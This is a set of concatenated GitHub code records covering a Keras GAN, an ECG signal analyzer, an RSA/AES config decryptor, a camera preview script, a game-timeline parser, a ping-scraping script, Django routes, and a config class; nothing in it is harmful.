build_generator(SEED_SIZE, image_shape):\n\n    filter_constant = 16\n    l2reg = tf.keras.regularizers.l2()\n\n    height = image_shape[0]\n    width = image_shape[1]\n    depth = image_shape[-1]\n\n    model = tf.keras.Sequential()\n    model.add(tf.keras.layers.Dense(height*width*depth*filter_constant, input_shape=(SEED_SIZE,)))\n\n    model.add(tf.keras.layers.BatchNormalization())\n    model.add(tf.keras.layers.LeakyReLU())\n    model.add(tf.keras.layers.LeakyReLU())\n\n    model.add(tf.keras.layers.Reshape((int(height/2), int(width/2), depth * 4 * filter_constant)))\n    print(model.output_shape)\n\n    model.add(tf.keras.layers.Conv2DTranspose(depth * filter_constant, (5, 5), strides=(2, 2), padding='same'))\n    print(model.output_shape)\n    model.add(tf.keras.layers.BatchNormalization())\n    model.add(tf.keras.layers.LeakyReLU())\n\n    model.add(tf.keras.layers.Conv2DTranspose(depth * int(filter_constant/2), (5, 5), strides=(1, 1), padding='same'))\n    print(model.output_shape)\n    model.add(tf.keras.layers.BatchNormalization())\n    model.add(tf.keras.layers.LeakyReLU())\n\n    model.add(tf.keras.layers.Conv2DTranspose(depth, (5, 5), strides=(1, 1), padding='same', activation='tanh'))\n    print(model.output_shape)\n\n    return model\n\n\ndef 
build_discriminator(img_shape, depth):\n\n const = ClipConstraint(0.02)\n\n model = tf.keras.Sequential()\n model.add(tf.keras.layers.Conv2D(depth*64, (5, 5), strides=(2, 2), padding='same', input_shape=img_shape, kernel_constraint=const))\n model.add(tf.keras.layers.LeakyReLU())\n model.add(tf.keras.layers.Dropout(0.2))\n\n model.add(tf.keras.layers.Conv2D(depth*128, (5, 5), strides=(2, 2), padding='same', kernel_constraint=const))\n model.add(tf.keras.layers.LeakyReLU())\n model.add(tf.keras.layers.Dropout(0.2))\n\n model.add(tf.keras.layers.Flatten())\n model.add(tf.keras.layers.Dense(1))\n\n return model\n\n\ncross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)\n\n\n# def discriminator_loss(real_output, fake_output):\n# real_loss = cross_entropy(tf.ones_like(real_output), real_output)\n# fake_loss = cross_entropy(tf.zeros_like(fake_output), fake_output)\n# total_loss = real_loss + fake_loss\n# return total_loss\n#\n#\n# def generator_loss(fake_output):\n# return cross_entropy(tf.ones_like(fake_output), fake_output)\n\n\ndef critic_loss(label, output):\n return tf.keras.backend.mean(label*output)\n\n\ndef wasserstein_generator_loss(fake_output):\n return -tf.keras.backend.mean(fake_output)\n\n\n# clip model weights to a given hypercube\nclass ClipConstraint:\n # set clip value when initialized\n def __init__(self, clip_value):\n self.clip_value = clip_value\n\n # clip model weights to hypercube\n def __call__(self, weights):\n return tf.keras.backend.clip(weights, -self.clip_value, self.clip_value)\n\n # get the config\n def get_config(self):\n return {'clip_value': self.clip_value}\n\n\n\n\n","repo_name":"MichaelWheeler202/Image_GAN","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11600255756","text":"import math as m\nimport logging\nfrom ecgdetectors import Detectors\nimport json\nimport matplotlib.pyplot as plt\n\n\ndef analyze_data_file(filename):\n \"\"\"Read and format the inputted ecg data\n\n analyze_data_file takes in a raw .csv file that has a time and voltage\n comma delimited data set and reads in all data that is properly\n formatted into float arrays for a time and voltage separately.\n\n :param filename: The filename and path of the raw .csv ecg data on the\n local machine\n\n :returns: The time and voltage float arrays without any empty, nan,\n or string cells\n \"\"\"\n kickstart(filename)\n time = []\n voltage = []\n in_file = open(filename, 'r')\n keep_reading = True\n line_number = 0\n while keep_reading:\n data_line = in_file.readline()\n if data_line == \"\": # ok to use because will have at least a comma\n keep_reading = False\n else:\n line_number += 1\n append, time_point, voltage_point = \\\n process_line(data_line, line_number)\n if append is True:\n time.append(time_point)\n voltage.append(voltage_point)\n in_range(voltage_point, line_number)\n in_file.close()\n return time, voltage\n\n\ndef kickstart(filename):\n \"\"\"Log an info entry when starting to analyze a new data file\n\n kickstart is a function that merely logs an info note when starting to\n analyze a new ECG data file.\n\n :param filename: The filename including the entire path of the data file\n \"\"\"\n logging.info(\n \"The file {} has started analysis.\"\n .format(filename))\n\n\ndef in_range(voltage_point, line_number):\n \"\"\"Identify Voltage data outside +/- 300 mV\n\n in_range looks at a single float voltage data point 
to determine if it\n is within +/- 300mV. If the data point is outside this range, a warning\n is logged.\n\n :param voltage_point: The singular voltage data value\n :param line_number: The line number of the voltage point in raw data file\n \"\"\"\n if abs(voltage_point) > 300.0:\n logging.warning(\n \"The line {} has a voltage outside +/- 300 mV.\"\n .format(line_number))\n return\n\n\ndef process_line(data_line, line_no):\n \"\"\"Format the data line if numerical and proper data entry\n\n process_line takes in a string of a time and voltage data line. This\n string is process via three trial cases to ensure there is not\n a string, nan, or empty cell for the data. This is then either returned\n or a warning is lgged with the line number.\n\n :param data_line: String line of time and voltage data points\n :param line_no: Line number int of current line\n\n :returns: a boolean of True when no problems exist with data\n Either two strings of 0.0 or the float data points from the data line\n \"\"\"\n append = True\n data_points = data_line.strip(\"\\n\").split(\",\")\n time_point = data_points[0]\n voltage_point = data_points[1]\n if time_point == \"\" or voltage_point == \"\":\n logging.warning(\"The line {} has a missing time or voltage\".\n format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n time_nums = remove_period_neg(time_point)\n voltage_nums = remove_period_neg(voltage_point)\n try:\n if m.isnan(float(time_point)) is True or \\\n m.isnan(float(voltage_point)) is True:\n logging.warning(\"The line {} has a NaN \"\n \"time or voltage\".format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n except ValueError:\n if not (time_nums.isnumeric() and voltage_nums.isnumeric()):\n logging.warning(\"The line {} has a string\"\n \" time or voltage\".format(line_no))\n append = False\n time_point = \"0.0\"\n voltage_point = \"0.0\"\n return append, time_point, voltage_point\n return append, float(time_point), float(voltage_point)\n\n\ndef remove_period_neg(string_entry):\n \"\"\"Format a string to determine if the string isnumeric()\n\n remove_period_neg is a function that takes a string and removes any\n periods or dashes. Numerically, these represent a decimal point or a\n negative sign.\n\n :param string_entry: A string type of a time or voltage data point\n\n :returns: The final string with periods or dashes\n \"\"\"\n new_string = string_entry.replace(\".\", \"\").replace(\"-\", \"\")\n return new_string\n\n\ndef calculate_sampling_freq(time_array):\n \"\"\"Identify the Sampling Frequency for the Peak Detecting Module\n Implemented\n\n calculate_sampling frequency looks at two time data points to quantify\n the sampling frequency of the ECG data.\n\n :param time_array: The float array of all raw time points\n\n :returns: The sampling frequency or inverse of sampling period\n \"\"\"\n dt = time_array[1]-time_array[0]\n fs = 1/dt\n return fs\n\n\ndef calculate_total_time(time_array):\n \"\"\"Identify the length of time of the data file\n\n calculate_total_time finds the differences in time between the first\n and last array entries to find the total time. 
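\n# A minimal alternative sketch (hypothetical helper, not wired into process_line above): remove_period_neg plus isnumeric rejects scientific notation such as '1e-3', while float() accepts it directly.\ndef parse_number(token):\n    # float() handles '-', '.', and exponents; a failed parse or a NaN\n    # flags the token as invalid\n    try:\n        value = float(token)\n    except ValueError:\n        return False, 0.0\n    if m.isnan(value):\n        return False, 0.0\n    return True, value\n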
This is logged after\n finishing to illustrate the code status.\n\n :param time_array: The formatted time input data from the ECG file\n\n :returns: The length of time float of the time array\n \"\"\"\n total_time = time_array[-1]-time_array[0]\n logging.info(\"The total time has been calculated\")\n return total_time\n\n\ndef calculate_min_max(voltage_array):\n \"\"\"Find the min and max voltages\n\n calculate_min_max uses the min and max functions in python\n to identify the largest and smallest (including negatives)\n voltage data points. This is then logged.\n\n :param voltage_array: The formatted voltage input data from the ECG file\n in mV\n\n :returns: a tuple of the float min and max\n voltages\n \"\"\"\n max_voltage = max(voltage_array)\n min_voltage = min(voltage_array)\n logging.info(\"The min and max voltages have been calculated\")\n return (min_voltage, max_voltage)\n\n\ndef find_peak_attributes(voltage_array, time_array):\n \"\"\"Identify the Peak Indexes and Number of Peaks\n\n find_peak_attributes implements the two_average_detector function to\n identify the index points of each R peak. The resultant array length\n represents the number of peaks. This is then logged.\n\n :param voltage_array: The formatted voltage input data array\n :param time_array: The formatted time input data array\n\n :return: an array of index values for when the peaks occur and an int\n quantity of the number of peaks.\n \"\"\"\n detectors = Detectors(calculate_sampling_freq(time_array))\n r_peaks = detectors.two_average_detector(voltage_array)\n num_peaks = len(r_peaks)\n logging.info(\"The number of peaks has been calculated\")\n return r_peaks, num_peaks\n\n\ndef find_peak_times(time_array, peak_array):\n \"\"\"Identify the time points when peaks occur\n\n find_peak_times searches for the time points in the time_array\n that correspond to the index values of the peaks. This is then logged.\n\n :param time_array: The formatted time input data array\n :param peak_array: The array of peak index locations\n\n :returns: An array of float time values for when the peaks occurred\n \"\"\"\n peak_times = []\n for i in range(len(peak_array)):\n peak_times.append(time_array[peak_array[i]])\n logging.info(\"The peak times have been calculated\")\n return peak_times\n\n\ndef find_mean_hr(num_peaks, peak_times):\n \"\"\"Identify the heartrate in bpm\n\n find_mean_hr Divides the time between the outer most R peaks by the\n number of peaks to determine the average heart rate. This is then scaled\n to bpm and logged.\n\n :param num_peaks: The int number of peaks in the data set\n :param peak_times: The array of times corresponding to each R peak\n\n :returns: The float of the mean heart rate\n \"\"\"\n time_diff_between_peaks = peak_times[-1]-peak_times[0]\n time_in_min = time_diff_between_peaks/60\n mean_hr = num_peaks/time_in_min\n logging.info(\"The mean hr has been calculated\")\n return mean_hr\n\n\ndef create_out_dict(time_array, voltage_array):\n \"\"\"Create a dictionary with all specified outputs\n\n create_out_dict runs the calculation functions for all of the desired\n metrics. 
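\n# A short beat-to-beat variant (hypothetical helper; assumes numpy is available, which this module does not otherwise import): find_mean_hr above averages over the whole record, while successive R-R intervals give instantaneous rates.\ndef instantaneous_hr(peak_times):\n    import numpy as np\n    # Differences between consecutive R-peak times are R-R intervals in\n    # seconds; 60/RR converts each interval to beats per minute\n    rr = np.diff(peak_times)\n    return 60.0 / rr\n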
This is followed by adding these metrics to a dictionary and\n    calling a function to log the status.\n\n    :param time_array: The formatted time input data array\n    :param voltage_array: The formatted voltage input data array\n\n    :returns: a dictionary of desired outputs from ECG analysis\n    \"\"\"\n    duration = calculate_total_time(time_array)\n    voltage_extremes = calculate_min_max(voltage_array)\n    # A single call returns both the peak indices and the peak count, so\n    # there is no need to run the detector twice\n    peaks, num_beats = find_peak_attributes(voltage_array, time_array)\n    beats = find_peak_times(time_array, peaks)\n    mean_hr_bpm = find_mean_hr(num_beats, beats)\n\n    metrics = {\n        \"duration\": duration,\n        \"voltage_extremes\": voltage_extremes,\n        \"num_beats\": num_beats,\n        \"mean_hr_bpm\": mean_hr_bpm,\n        \"beats\": beats,\n    }\n    dict_log()\n    return metrics\n\n\ndef dict_log():\n    \"\"\"Log info after creating dictionary\n\n    dict_log creates a log entry to be called after writing metrics to a\n    dictionary.\n    \"\"\"\n    logging.info(\"The dictionary has been filled with data values\")\n\n\ndef output_json(dictionary, filename):\n    \"\"\"Create a .json with the metrics dictionary\n\n    output_json merely takes a dictionary of metrics and creates a .json as\n    the desired output format.\n\n    :param dictionary: The metrics dictionary\n    :param filename: The string name of the filename\n    \"\"\"\n    # slice off the \".csv\" extension (str.strip would drop any leading or\n    # trailing '.', 'c', 's', 'v' characters, not the suffix)\n    new_name = filename[:-len(\".csv\")] + \".json\"\n    out_file = open(new_name, \"w\")\n    json.dump(dictionary, out_file)\n    out_file.close()\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(filename=\"log_example\", level=logging.INFO)\n    filename = \"test_data23.csv\"\n    path = \"/Users/benrandoing/Documents/BME_547\" \\\n           \"/class_repos/ecg-analysis-benrandoing20/\" \\\n           \"test_data/\"+filename\n    time, voltage = analyze_data_file(path)\n    # plt.plot(time,voltage)\n    # plt.show()\n    metrics = create_out_dict(time, voltage)\n    output_json(metrics, filename)\n","repo_name":"benrandoing20/Patient-Monitoring-Server-Client","sub_path":"ecg_cont_processor.py","file_name":"ecg_cont_processor.py","file_ext":"py","file_size_in_byte":10508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22977565093","text":"#!/usr/bin/python\nimport os\nimport random\nimport re\nimport string\nimport json\nfrom pathlib import Path\nimport Crypto\nfrom Crypto.Cipher.PKCS1_OAEP import PKCS1OAEP_Cipher\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP\nfrom configobj import ConfigObj\n\n\nclass Messenger:\n    def __init__(self):\n        self.session_key = None\n        self.cipher_rsa: RSA.RsaKey = None\n        self.enc_session_key: PKCS1OAEP_Cipher = None\n        # self.cipher_aes = None\n        self.ciphertext, self.tag = (\"\", \"\")\n        self.security_manager = None\n        self.config = None\n        self.config_dictionary: dict = None\n        self.configfile = ''.join(str(Path(os.getcwd()).parent) + f\"\\\\src\\\\security\\\\config.bin\")\n        self.keyfile = ''.join(str(Path(os.getcwd()).parent) + f\"\\\\src\\\\security\\\\private_key.pem\")\n\n    def init(self, keyfile=\"private_key.pem\", configfile=\"config.bin\"):\n        self.keyfile = keyfile\n        self.configfile = configfile\n        # 'is' tests identity, not equality; string comparison needs ==\n        if configfile == \"config.bin\":\n            if self.unlock_file(self.keyfile):\n                self.session_key = self.get_session(self.keyfile)\n                # Keep a handle on the RSA key that backs the session cipher\n                self.cipher_rsa = self.session_key._key\n                self.lock_file(self.keyfile)\n            self.lock_file(self.keyfile)\n        self.config = self.load_config(configfile=self.configfile, keyfile=self.keyfile)
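\n\n    # A self-contained reference sketch (illustration only, not wired into this class): the hybrid RSA-OAEP + AES-EAX round trip that encrypt_file and decrypt_file below apply to files.\n    @staticmethod\n    def _hybrid_roundtrip_demo(data=b'hello'):\n        key = RSA.generate(2048)\n        session_key = get_random_bytes(16)\n        # Wrap the AES session key with the RSA public key\n        enc_session_key = PKCS1_OAEP.new(key.publickey()).encrypt(session_key)\n        cipher_aes = AES.new(session_key, AES.MODE_EAX)\n        ciphertext, tag = cipher_aes.encrypt_and_digest(data)\n        # Unwrap with the private key; decrypt_and_verify raises on tampering\n        unwrapped = PKCS1_OAEP.new(key).decrypt(enc_session_key)\n        plain = AES.new(unwrapped, AES.MODE_EAX, cipher_aes.nonce).decrypt_and_verify(ciphertext, tag)\n        assert plain == data\n        return plain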
\n\n    def update_config(self, config: ConfigObj):\n        try:\n            self.config_dictionary = dict({\n                \"MONGO_SERVER\": config['cloud.mongodb']['connection_url'],\n                \"DATABASES\": config['cloud.mongodb']['databases'],\n                \"CRED_USER\": config['cloud.mongodb']['credential_manager']['username'],\n                \"CRED_PASSWORD\": config['cloud.mongodb']['credential_manager']['password'],\n                \"JOB_MANAGER_ID\": config['cloud.mongodb']['job_manager']['username'],\n                \"JOB_MANAGER_PASS\": config['cloud.mongodb']['job_manager']['password'],\n                \"SCRAPER_ACCOUNT\": config['cloud.mongodb']['scraperadmin'],\n                \"PROXY\": config['proxy'],\n                \"KEYMANAGER\": config['keymanager']\n            })\n        except Exception as e:\n            return False\n        return self.config_dictionary\n\n    def encrypt_file(self, datafile: str, fileout: str):\n        data = open(datafile, \"rb\").read()\n        file_out = open(f\"{os.getcwd()}\\\\src\\\\security\\\\{fileout}.bin\", \"wb\")\n        # Encrypt against the public half of the key already wrapped by the\n        # session cipher; re-importing the key's repr() string would fail\n        recipient_key = self.session_key._key.publickey()\n        random_key = get_random_bytes(16)\n\n        # Encrypt the session key with the public RSA key\n        cipher_rsa = PKCS1_OAEP.new(recipient_key)\n        enc_session_key = cipher_rsa.encrypt(random_key)\n\n        # Encrypt the data with the AES session key\n        cipher_aes = AES.new(random_key, AES.MODE_EAX)\n        ciphertext, tag = cipher_aes.encrypt_and_digest(data)\n        [file_out.write(x) for x in (enc_session_key, cipher_aes.nonce, tag, ciphertext)]\n\n    def get_session(self, keyfile=\"private_key.pem\"):\n        if self.unlock_file(keyfile):\n            # PKCS1_OAEP.new() expects an RSA key object, not the raw PEM text\n            session: PKCS1OAEP_Cipher = PKCS1_OAEP.new(RSA.import_key(open(keyfile).read()))\n            self.lock_file(keyfile)\n            return session\n\n    def unlock_file(self, filename):\n        try:\n            os.system(f\"chmod 644 {filename}\")\n            return True\n        except Exception as e:\n            print(e)\n            return False\n\n    def lock_file(self, filename):\n        try:\n            # Tighten permissions back down; repeating unlock_file's chmod 644\n            # would leave the private key readable\n            os.system(f\"chmod 400 {filename}\")\n        except Exception as e:\n            print(e)\n            return False\n\n    def decrypt_data(self, data):\n        session = self.get_session(self.keyfile)\n        rsa_key = session._key\n        enc_session_key, nonce, tag, ciphertext = \\\n            [data.read(x) for x in (rsa_key.size_in_bytes(), 16, 16, -1)]\n        # Decrypt the session key with the private RSA key\n        cipher_rsa = PKCS1_OAEP.new(rsa_key)\n        session_key = cipher_rsa.decrypt(enc_session_key)\n\n        # Decrypt the data with the AES session key\n        cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n        data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n        print(data.decode(\"utf-8\"))\n\n    def decrypt_file(self, datafile):\n        try:\n            datafile = open(datafile, \"rb\")\n            private_key = self.session_key._key\n            enc_session_key, nonce, tag, ciphertext = \\\n                [datafile.read(x) for x in (private_key.size_in_bytes(), 16, 16, -1)]\n            # Decrypt the session key with the private RSA key\n            cipher_rsa = PKCS1_OAEP.new(private_key)\n            session_key = cipher_rsa.decrypt(enc_session_key)\n\n            # Decrypt the data with the AES session key\n            cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n            data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n            return data\n\n        except Exception as e:\n            print(e)\n            return False\n\n    def load_config(self, configfile=\"config.bin\", keyfile=\"private_key.pem\"):\n\n        # endswith is clearer and safer than a quantified-lookbehind regex\n        if configfile.endswith(\"bin\"):\n            config_data = self.decrypt_file(datafile=configfile)\n            try:\n                temp_file = ''.join(random.choice(string.ascii_lowercase) for x in range(10)) + \".tmp\"\n                with open(f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\", \"wb\") as writeout:\n                    
writeout.write(config_data)\n\n config = ConfigObj(f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n self.config = config\n self.update_config(config)\n os.system(\"rm \" + f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n return config\n except Exception as e:\n print(e)\n os.system(\"rm \" + f\"{str(Path(os.getcwd()))}\" + f\"\\\\src\\\\security\\\\{temp_file}\")\n return False\n else:\n config = ConfigObj(f\"{configfile}\")\n if self.update_config(config):\n return config\n else:\n print(\"No configurations found for session!\")\n return False\n\n\ndef main():\n print(\"main\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"charly-sen/Archive-Networker","sub_path":"src/security/key_services.py","file_name":"key_services.py","file_ext":"py","file_size_in_byte":6502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1364413083","text":"import numpy as np\nimport cv2\nfrom picamera2 import Picamera2\n\ncv2.startWindowThread()\n\n# cap = cv2.VideoCapture(0)\npicam2 = Picamera2()\npicam2.configure(picam2.create_preview_configuration(main={\"format\": 'RGB888', \"size\": (640, 480)}))\npicam2.start()\n\nwhile(True):\n # ret, frame = cap.read()\n frame = picam2.capture_array()\n #frame = cv2.flip(frame, -1)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n cv2.imshow('frame', frame)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# cap.release()\ncv2.destroyAllWindows()","repo_name":"ngGuerrilla/balltracker","sub_path":"src/start_preview_gray_and_color.py","file_name":"start_preview_gray_and_color.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30172543056","text":"import json\n\nf = open('lol.json')\ndata = json.load(f)\n\ninfo = data['info']\n\nframes = data[\"info\"][\"frames\"]\n\nevents = []\n\ntimelineInfo = [] # This list will include objects with x position, y position, timestamp\n\neventsWithPos = []\n\n\n# Loop and Save the event list\nfor i in range(len(frames)):\n events.append(frames[i]['events'])\n\n # Looping through events, save position,\n # timestamp and its relevant event\n for j in range(len(events[i])):\n try:\n if events[i][j]['position']:\n eventsWithPos.append(events[i][j])\n except KeyError:\n continue\n\nplayer9PosTime = []\nplayer9Time = []\n\ndef add_Info():\n player9PosTime.append(eventsWithPos[i]['position'])\n player9Time.append(eventsWithPos[i]['timestamp'])\n\n\n# Find out the timestamp and position info when any events happened to the player 9\n# for i in range(len(eventsWithPos)):\n# for j in range(10):\n# try:\n# if eventsWithPos[i]['killerId'] == j+1:\n# add_Info()\n# continue\n#\n# if eventsWithPos[i]['victimId'] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['assistingParticipantIds'])):\n# if eventsWithPos[i]['assistingParticipantIds'][j] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['victimDamageDealt'])):\n# if eventsWithPos[i]['victimDamageDealt'][j] == j+1:\n# add_Info()\n# continue\n#\n# for k in range(len(eventsWithPos[i]['victimDamageReceived'])):\n# if eventsWithPos[i]['victimDamageReceived'][j] == j+1:\n# add_Info()\n# continue\n# except KeyError:\n# pass\n#\n# # Cleaning the data\n# for l in range(len(player9PosTime)):\n# player9PosTime[l]['timestamp'] = player9Time[l]\n# participantFrame = []\n# 
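\n# A compact sketch of the flattening attempted below (hypothetical helper; assumes the Riot timeline schema used in this file, including 'x'/'y' keys inside each position dict), keeping every position paired with its frame's timestamp instead of mapping indices back afterwards.\ndef flatten_positions(frames):\n    rows = []\n    for frame in frames:\n        ts = frame['timestamp']\n        for pid, pdata in frame['participantFrames'].items():\n            pos = pdata['position']\n            rows.append({'playerId': int(pid), 'x': pos['x'],\n                         'y': pos['y'], 'timestamp': ts})\n    return rows\n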
# participantFrame.append(frames[0][\"participantFrames\"]) # 0 as var\n# print(participantFrame[0]['1']['position']) # 0 as constant, '1' var\n\n# Get player9's position and timestamps based on 60s' interval\nfor i in range(len(frames)):\n    participantFrame = [frames[i][\"participantFrames\"]]\n\n    for j in range(10):\n        timelineInfo.append(participantFrame[0][str(j+1)]['position'])\n\nid = 1\n\nfor i in range(len(timelineInfo)):\n    # position i+1, index i\n    if id > 10:\n        id = 1\n    if id <= 10:\n        timelineInfo[i]['playerId'] = id\n        id = id + 1\n\n    # each frame contributed 10 entries above, so entry i maps back to\n    # frame i // 10\n    timelineInfo[i]['timestamp'] = frames[i // 10][\"timestamp\"]\n\nprint(timelineInfo)\n\n# Insert player9's position and time into timelineInfo\n\n# for i in range(len(player9PosTime)):\n#     timelineInfo.append(player9PosTime[i])\n\n# Ordering it based on the timestamp\n\n# timelineInfo.sort(key=lambda x:x['timestamp'])\n\n# print(timelineInfo)\n\n# jsonString = json.dumps(timelineInfo)\n# jsonFile = open(\"combinedData.json\", \"w\")\n# jsonFile.write(jsonString)\n# jsonFile.close()","repo_name":"kratewong/MOBA_Data_Analysis","sub_path":"analyzeTwo.py","file_name":"analyzeTwo.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12502124045","text":"from util import *\nfrom mode import create_train_data, train_regression, estimation\n\ntitle()\nmode = \"\"\nENDCODE = \"4\"\n\nwhile mode != ENDCODE :\n    mode = menu()\n    if mode == \"1\":\n        create_train_data()\n    elif mode == \"2\":\n        train_regression()\n    elif mode == \"3\":\n        estimation()\n\n\n\nprint(\"\\n프로그램이 종료되었습니다.\")\n","repo_name":"heech912/Machine_Learning_Project_HU_2020A","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34052873443","text":"'''\nimport re\nx=raw_input('Enter string')\n#m=re.search('.*= (.*)/(.*)/(.*)/(.*) ms',x)\n#print m.group(2)\n\n\nx=raw_input('Enter string')\nm=re.search('(.*),(.*), (.*)% packet loss',x)\nprint m.group(3)\n'''\n\nimport re\nimport requests\nfrom requests.auth import HTTPProxyAuth\n\nURL = \"http://www.spfld.com/cgi-bin/ping\"\nip = input(\"ip\")\nonvar = \"on\"\nct = 10\nsz = 64\nPARAMS = {'remote_host':ip,'dns':onvar,'count':ct,'size':sz}\n\nproxyDict = { 'http' : '172.16.115.24:3128', 'https' : '172.16.115.24:3128' } \nauth = HTTPProxyAuth('mitansh', 'pass')\n\nf = open(ip+'.txt','w')\n\navg=0\nf.write(\"Attempt\")\nfor run in range(0, 20):\n\tr = requests.get(url = URL, params = PARAMS, proxies=proxyDict, auth=auth)\n\tinp = r.text\n\tlis = inp.splitlines()\n\tm=re.search('.*= (.*)/(.*)/(.*)/(.*) ms',lis[4])\n\tm.group(2)\n\tk=re.search('(.*),(.*), (.*)% packet loss',lis[3])\n\tf.write(m.group(2)+\"\\n\"+k.group(3)+\"\\n\")\n\tavg+=float(m.group(2))\n\n# avg accumulated a sum over the 20 runs; divide so the report is a mean\nf.write(\"avg=\"+str(avg/20)+\"\\n\")\n\nf.close()","repo_name":"rohanaggarwal7997/Networks-Lab-","sub_path":"Ass1/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7806365829","text":"from django.urls import path\nfrom . 
import views\nfrom .views import *\n\nurlpatterns = [\n \n path('',views.home, name='home'),\n path('signup/',views.Signup,name='signup'),\n path('login/', views.User_login, name='login'),\n path('logout/', views.user_logout, name='logout'),\n path('profile/', views.profile, name='profile'),\n path('jobs/',views.jobs, name='jobs'),\n path('updateprofile//', views.update_profile, name='updateprofile'),\n path('employer//',views.employer_mode, name='employer'),\n path('add_job/',views.add_job, name=\"addJob\"),\n path('add_experience',views.add_experience, name=\"addExp\"),\n path('add_certification',views.add_certification,name=\"addCertification\"),\n path('apply_job/',views.apply_job, name='applyjob'),\n \n]\n","repo_name":"NIrajan-15/Blue-Collar","sub_path":"App/Job/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71132128250","text":"# *-* coding: utf-8 *-*\nimport logging\nfrom optparse import OptionParser\nimport platform\nimport os\n\nimport lib_dd.version as version\nimport NDimInv.data_weighting as data_weighting\n\n\nclass cfg_base(dict):\n\n class cfg_obj(object):\n def __init__(self, type, help, cmd_dict, possible_values=None):\n self.type = type\n self.help_text = help\n self.cmd_dict = cmd_dict\n self.possible_values = possible_values\n\n def __init__(self):\n self.web_order = [\n 'nr_terms_decade',\n ]\n\n # these options will not be shown in the web interface\n self.web_blacklist = [\n 'version',\n 'frequency_file',\n 'data_file',\n 'output_dir',\n 'nr_cores',\n 'silent',\n 'output_format',\n 'use_tmp',\n 'data_format',\n ]\n\n # will store the command line parser object\n self.cmd_parser = None\n # store the cfg objects here\n self.cfg = {}\n\n # add the actual configs here\n self['frequency_file'] = 'frequencies.dat'\n self.cfg['frequency_file'] = self.cfg_obj(\n type='string',\n help='Frequency file',\n cmd_dict={\n 'short': '-f',\n 'long': '--frequency_file',\n 'metavar': 'FILE',\n }\n )\n\n self['ignore_frequencies'] = None\n self.cfg['ignore_frequencies'] = self.cfg_obj(\n type='string',\n help=''.join((\n 'Frequency ids to ignore, example:',\n \"12,13,14\",\n '. Starts with index 0.',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--ignore',\n 'metavar': 'STRING',\n },\n\n )\n\n self['data_fmin'] = None\n self.cfg['data_fmin'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Ignore frequencies below this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--fmin',\n 'metavar': 'FLOAT',\n },\n )\n\n self['data_fmax'] = None\n self.cfg['data_fmax'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Ignore frequencies above this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--fmax',\n 'metavar': 'FLOAT',\n },\n )\n\n self['plot_spectra'] = False\n self.cfg['plot_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot final iterations (default: False)',\n cmd_dict={\n 'short': '-p',\n 'long': '--plot',\n 'action': 'store_true',\n },\n\n )\n\n self['data_file'] = 'data.dat'\n self.cfg['data_file'] = self.cfg_obj(\n type='string',\n help='data file',\n cmd_dict={\n 'short': '-d',\n 'long': '--data_file',\n 'metavar': 'FILE'\n },\n )\n\n self['data_format'] = 'rmag_rpha'\n self.cfg['data_format'] = self.cfg_obj(\n type='string',\n help=''.join((\n 'Input data format, possible values are: ',\n 'rmag_rpha, lnrmag_rpha, log10rmag_rpha, rmag_rpha, ',\n ' rre_rim rre_rmim, cmag_cpha, cre_cim, cre_cmim. 
